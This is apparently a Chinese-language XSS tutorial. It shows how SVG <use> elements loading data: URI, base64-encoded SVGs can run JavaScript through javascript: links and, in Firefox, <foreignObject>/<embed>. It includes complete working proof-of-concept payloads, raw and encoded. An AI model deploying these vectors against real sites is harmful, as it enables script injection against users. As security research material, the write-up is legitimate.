SVG中的<use>元素用于重用其他元素,主要用于联接<defs>和alike,而我们却用它来引用外部SVG文件中的元素
元素通过其id被引用,在<use>标签的xlink:href属性中以'#'井字符开头,外部元素的引用同样如此
基本结构如下所示:
test.html
<svg>
<use xlink:href='external.svg#rectangle' />
</svg>external.svg:
<svg id="rectangle" xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
width="100" height="100">
<a xlink:href="javascript:alert(location)">
<rect x="0" y="0" width="100" height="100" />
</a>
</svg> sxternal.svg文件以<svg>标签开始,其id设置为rectangle(矩形),使用<rect>标签绘一个矩形。可以使用<a>环绕<rect>标签,这样会创建一个超链接。使用Javascript的url协议,可点击的超链接在点击后会执行Javascript。
虽然SVG是经由<use>标签加载的,Javascript将会得到执行。有一点需要注意,它只能加载SVG文件,且必须满足同源策略
由于加载的外部SVG文件必须是同源的,这个特性看起来似乎无法作为有用的XSS攻击向量,但你可以使用data:url协议,它允许我们百忙之中从内部创建一个文件。它要求正确的mime-type,在这里为image/svg+xml。mimie-type后是我们的攻击载荷或关键字base64。特别地,由于数据被base64编码,这有助于避免突破HTML结构的问题。
现在我们不必再依赖于服务器上的另一个文件了:
test.html:
<svg>
<use xlink:href="data:image/svg+xml;base64,
PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDo
vL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW
5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rI
iAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+DQo8
YSB4bGluazpocmVmPSJqYXZhc2NyaXB0OmFsZXJ0KGx
vY2F0aW9uKSI+PHJlY3QgeD0iMCIgeT0iMCIgd2lkdG
g9IjEwMCIgaGVpZ2h0PSIxMDAiIC8+PC9hPg0KPC9zd
mc+#rectangle" />
</svg>解码后的base64载荷:
<svg id="rectangle"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
width="100" height="100">
<a xlink:href="javascript:alert(location)">
<rect x="0" y="0" width="100" height="100" />
</a>
</svg>浏览器会显示出一个黑色的矩形,当点击时会弹出其location。
但是为什么要烦扰受害者去点击呢,他们从来都不会去做该做的事:)
external.svg中的<script>标签不会被解析,但是SVG支持<foreignObject>元素(仅在Firefox浏览器支持此元素)
通过阐述这个对象需要的扩展属性,有可能加载非SVG元素
这就意味着现在有可能是有<iframe>、<embed>及其他所有支持的HTML元素了,我们可以从一堆元素中进行选择执行Javascript,这里使用<embed>+JavascriptURL协议
看如下SVG:
<svg id="rectangle"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
width="100" height="100">
<script>alert(1)</script>
<foreignObject width="100" height="50"
requiredExtensions="http://www.w3.org/1999/xhtml">
<embed xmlns="http://www.w3.org/1999/xhtml"
src="javascript:alert(location)" />
</foreignObject>
</svg>它会通过<foreignObject>加载嵌入的标签,使用JavascriptURL协议执行Javascript
然后我们用base64对载荷进行编码,通过data:协议加载它
test.html
<svg>
<use xlink:href="data:image/svg+xml;base64,
PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cD
ovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhs
aW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW
5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3
JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0i
NTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZW
RFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8x
OTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dH
A6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0i
amF2YXNjcmlwdDphbGVydChsb2NhdGlvbikiIC8+DQ
ogICAgPC9mb3JlaWduT2JqZWN0Pg0KPC9zdmc+#rectangle" />
</svg>test.html用Firefox浏览器打开,会弹出location
这样我们在SVG中就有了另一个能执行Javascript的向量了
另外,我们在攻击载荷中包含了一个<script>alert(1)</script>,这证明了<script>标签不会被svg解析